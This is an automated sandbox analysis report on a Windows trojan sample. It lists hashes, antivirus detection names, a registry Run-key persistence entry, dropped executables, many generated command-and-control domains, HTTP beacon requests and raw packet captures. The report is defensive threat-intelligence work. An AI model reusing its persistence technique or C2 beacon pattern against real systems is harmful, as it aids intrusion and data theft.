Analysis Date | 2015-10-14 02:58:40 |
---|---|
MD5 | 1c624878f8d1d6a778d36a1d67f566d0 |
SHA1 | 430873cf733e6ba7007865e421efdc4826b75de6 |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: 86e5d5600e5581e4a72414bf6a8531ea sha1: abec6f632032f422729dae7bbe2beb7aedbcbaac size: 294912 | |
Section | .rdata md5: 0b8b72b418e237bf5aea02bae1f2cb1e sha1: 33831d2edcaa8a8c8a4a68be4b04284e12e27337 size: 33280 | |
Section | .data md5: 3dc0dc18ea52db24b627f1ac435c29ee sha1: a332ef0493eaf995efddc887ae071532ab5c339d size: 108544 | |
Timestamp | 2014-10-30 09:47:09 | |
Packer | Microsoft Visual C++ ?.? | |
PEhash | 2c6b6ec2bd36db5d9a89a3fe4094fdb63e6ae665 | |
IMPhash | 7ed1d92c42d61181d01ac4918a4da139 | |
AV | CA (E-Trust Ino) | no_virus |
AV | F-Secure | Gen:Variant.Symmi.22722 |
AV | Dr. Web | Trojan.DownLoader14.3653 |
AV | ClamAV | no_virus |
AV | Arcabit (arcavir) | Gen:Variant.Symmi.22722 |
AV | BullGuard | Gen:Variant.Symmi.22722 |
AV | Padvish | no_virus |
AV | VirusBlokAda (vba32) | no_virus |
AV | CAT (quickheal) | Trojan.Dynamer.AC3 |
AV | Trend Micro | TROJ_FORUCON.BMC |
AV | Kaspersky | Trojan.Win32.Generic |
AV | Zillya! | Trojan.Agent.Win32.546225 |
AV | Emsisoft | Gen:Variant.Symmi.22722 |
AV | Ikarus | Trojan.FBAccountLock |
AV | Frisk (f-prot) | no_virus |
AV | Authentium | W32/Wonton.B.gen!Eldorado |
AV | MalwareBytes | Trojan.Agent.Gen |
AV | MicroWorld (escan) | Gen:Variant.Symmi.22722 |
AV | Microsoft Security Essentials | TrojanSpy:Win32/Nivdort.BD |
AV | K7 | Trojan ( 004cb2771 ) |
AV | BitDefender | Gen:Variant.Symmi.22722 |
AV | Fortinet | W32/Agent.VNC!tr |
AV | Symantec | Downloader.Upatre!g15 |
AV | Grisoft (avg) | Win32/Cryptor |
AV | Eset (nod32) | Win32/Agent.VNC |
AV | Alwil (avast) | Downloader-TLD [Trj] |
AV | Ad-Aware | Gen:Variant.Symmi.22722 |
AV | Rising | no_virus |
AV | Twister | Trojan.Agent.VNC.yaeu |
AV | Avira (antivir) | TR/AD.Nivdort.M.34 |
AV | Mcafee | Trojan-FEMT!1C624878F8D1 |
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\malware.exe
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Secure Fax Receiver Gateway WLAN BranchCache Base ➝ C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe |
---|---|
Creates File | C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe |
Creates Process | C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe |
Process
↳ C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe
Creates File | C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.kvi |
---|---|
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\qxlucfa.exe |
Creates Process | WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe" |
Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe"
Network Details:
DNS | collegesister.net Type: A 98.139.135.129 |
---|---|
DNS | collegelabor.net Type: A 173.254.12.103 |
DNS | middlesister.net Type: A 209.51.158.235 |
DNS | morningsilver.net Type: A 208.100.26.234 |
DNS | morningvalley.net Type: A 220.73.130.99 |
DNS | thinkdemand.net Type: A 184.168.221.43 |
DNS | collegesilver.net Type: A |
DNS | chiefsister.net Type: A |
DNS | chiefvalley.net Type: A |
DNS | collegevalley.net Type: A |
DNS | chieflabor.net Type: A |
DNS | oftensilver.net Type: A |
DNS | alonesilver.net Type: A |
DNS | oftensister.net Type: A |
DNS | alonesister.net Type: A |
DNS | oftenvalley.net Type: A |
DNS | alonevalley.net Type: A |
DNS | oftenlabor.net Type: A |
DNS | alonelabor.net Type: A |
DNS | middlesilver.net Type: A |
DNS | twelvesilver.net Type: A |
DNS | twelvesister.net Type: A |
DNS | middlevalley.net Type: A |
DNS | twelvevalley.net Type: A |
DNS | middlelabor.net Type: A |
DNS | twelvelabor.net Type: A |
DNS | rathersilver.net Type: A |
DNS | rathersister.net Type: A |
DNS | morningsister.net Type: A |
DNS | rathervalley.net Type: A |
DNS | ratherlabor.net Type: A |
DNS | morninglabor.net Type: A |
DNS | strangesilver.net Type: A |
DNS | historysilver.net Type: A |
DNS | strangesister.net Type: A |
DNS | historysister.net Type: A |
DNS | strangevalley.net Type: A |
DNS | historyvalley.net Type: A |
DNS | strangelabor.net Type: A |
DNS | historylabor.net Type: A |
DNS | amountsilver.net Type: A |
DNS | weathersilver.net Type: A |
DNS | amountsister.net Type: A |
DNS | weathersister.net Type: A |
DNS | amountvalley.net Type: A |
DNS | weathervalley.net Type: A |
DNS | amountlabor.net Type: A |
DNS | weatherlabor.net Type: A |
DNS | thicksilver.net Type: A |
DNS | classsilver.net Type: A |
DNS | thicksister.net Type: A |
DNS | classsister.net Type: A |
DNS | thickvalley.net Type: A |
DNS | classvalley.net Type: A |
DNS | thicklabor.net Type: A |
DNS | classlabor.net Type: A |
DNS | thinkbring.net Type: A |
DNS | presentbring.net Type: A |
DNS | thinklisten.net Type: A |
DNS | presentlisten.net Type: A |
DNS | presentdemand.net Type: A |
DNS | thinkshout.net Type: A |
DNS | presentshout.net Type: A |
DNS | chiefbring.net Type: A |
DNS | collegebring.net Type: A |
DNS | chieflisten.net Type: A |
DNS | collegelisten.net Type: A |
DNS | chiefdemand.net Type: A |
DNS | collegedemand.net Type: A |
DNS | chiefshout.net Type: A |
DNS | collegeshout.net Type: A |
DNS | oftenbring.net Type: A |
DNS | alonebring.net Type: A |
DNS | oftenlisten.net Type: A |
DNS | alonelisten.net Type: A |
DNS | oftendemand.net Type: A |
DNS | alonedemand.net Type: A |
DNS | oftenshout.net Type: A |
DNS | aloneshout.net Type: A |
DNS | middlebring.net Type: A |
DNS | twelvebring.net Type: A |
DNS | middlelisten.net Type: A |
DNS | twelvelisten.net Type: A |
DNS | middledemand.net Type: A |
DNS | twelvedemand.net Type: A |
HTTP GET | http://collegesister.net/index.php?email=scaty_c@yahoo.com&method=post&len User-Agent: |
HTTP GET | http://collegelabor.net/index.php?email=scaty_c@yahoo.com&method=post&len User-Agent: |
HTTP GET | http://middlesister.net/index.php?email=scaty_c@yahoo.com&method=post&len User-Agent: |
HTTP GET | http://morningsilver.net/index.php?email=scaty_c@yahoo.com&method=post&len User-Agent: |
HTTP GET | http://morningvalley.net/index.php?email=scaty_c@yahoo.com&method=post&len User-Agent: |
HTTP GET | http://thinkdemand.net/index.php?email=scaty_c@yahoo.com&method=post&len User-Agent: |
Flows TCP | 192.168.1.1:1031 ➝ 98.139.135.129:80 |
Flows TCP | 192.168.1.1:1032 ➝ 173.254.12.103:80 |
Flows TCP | 192.168.1.1:1033 ➝ 209.51.158.235:80 |
Flows TCP | 192.168.1.1:1034 ➝ 208.100.26.234:80 |
Flows TCP | 192.168.1.1:1035 ➝ 220.73.130.99:80 |
Flows TCP | 192.168.1.1:1036 ➝ 184.168.221.43:80 |
Raw Pcap
0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e 0x00000010 (00016) 6d61696c 3d736361 74795f63 40796168 mail=scaty_c@yah 0x00000020 (00032) 6f6f2e63 6f6d266d 6574686f 643d706f oo.com&method=po 0x00000030 (00048) 7374266c 656e2048 5454502f 312e300d st&len HTTP/1.0. 0x00000040 (00064) 0a416363 6570743a 202a2f2a 0d0a436f .Accept: */*..Co 0x00000050 (00080) 6e6e6563 74696f6e 3a20636c 6f73650d nnection: close. 0x00000060 (00096) 0a486f73 743a2063 6f6c6c65 67657369 .Host: collegesi 0x00000070 (00112) 73746572 2e6e6574 0d0a0d0a ster.net.... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e 0x00000010 (00016) 6d61696c 3d736361 74795f63 40796168 mail=scaty_c@yah 0x00000020 (00032) 6f6f2e63 6f6d266d 6574686f 643d706f oo.com&method=po 0x00000030 (00048) 7374266c 656e2048 5454502f 312e300d st&len HTTP/1.0. 0x00000040 (00064) 0a416363 6570743a 202a2f2a 0d0a436f .Accept: */*..Co 0x00000050 (00080) 6e6e6563 74696f6e 3a20636c 6f73650d nnection: close. 0x00000060 (00096) 0a486f73 743a2063 6f6c6c65 67656c61 .Host: collegela 0x00000070 (00112) 626f722e 6e65740d 0a0d0a0a bor.net..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e 0x00000010 (00016) 6d61696c 3d736361 74795f63 40796168 mail=scaty_c@yah 0x00000020 (00032) 6f6f2e63 6f6d266d 6574686f 643d706f oo.com&method=po 0x00000030 (00048) 7374266c 656e2048 5454502f 312e300d st&len HTTP/1.0. 0x00000040 (00064) 0a416363 6570743a 202a2f2a 0d0a436f .Accept: */*..Co 0x00000050 (00080) 6e6e6563 74696f6e 3a20636c 6f73650d nnection: close. 0x00000060 (00096) 0a486f73 743a206d 6964646c 65736973 .Host: middlesis 0x00000070 (00112) 7465722e 6e65740d 0a0d0a0a ter.net..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e 0x00000010 (00016) 6d61696c 3d736361 74795f63 40796168 mail=scaty_c@yah 0x00000020 (00032) 6f6f2e63 6f6d266d 6574686f 643d706f oo.com&method=po 0x00000030 (00048) 7374266c 656e2048 5454502f 312e300d st&len HTTP/1.0. 0x00000040 (00064) 0a416363 6570743a 202a2f2a 0d0a436f .Accept: */*..Co 0x00000050 (00080) 6e6e6563 74696f6e 3a20636c 6f73650d nnection: close. 0x00000060 (00096) 0a486f73 743a206d 6f726e69 6e677369 .Host: morningsi 0x00000070 (00112) 6c766572 2e6e6574 0d0a0d0a lver.net.... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e 0x00000010 (00016) 6d61696c 3d736361 74795f63 40796168 mail=scaty_c@yah 0x00000020 (00032) 6f6f2e63 6f6d266d 6574686f 643d706f oo.com&method=po 0x00000030 (00048) 7374266c 656e2048 5454502f 312e300d st&len HTTP/1.0. 0x00000040 (00064) 0a416363 6570743a 202a2f2a 0d0a436f .Accept: */*..Co 0x00000050 (00080) 6e6e6563 74696f6e 3a20636c 6f73650d nnection: close. 0x00000060 (00096) 0a486f73 743a206d 6f726e69 6e677661 .Host: morningva 0x00000070 (00112) 6c6c6579 2e6e6574 0d0a0d0a lley.net.... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e 0x00000010 (00016) 6d61696c 3d736361 74795f63 40796168 mail=scaty_c@yah 0x00000020 (00032) 6f6f2e63 6f6d266d 6574686f 643d706f oo.com&method=po 0x00000030 (00048) 7374266c 656e2048 5454502f 312e300d st&len HTTP/1.0. 0x00000040 (00064) 0a416363 6570743a 202a2f2a 0d0a436f .Accept: */*..Co 0x00000050 (00080) 6e6e6563 74696f6e 3a20636c 6f73650d nnection: close. 0x00000060 (00096) 0a486f73 743a2074 68696e6b 64656d61 .Host: thinkdema 0x00000070 (00112) 6e642e6e 65740d0a 0d0a0d0a nd.net......
Strings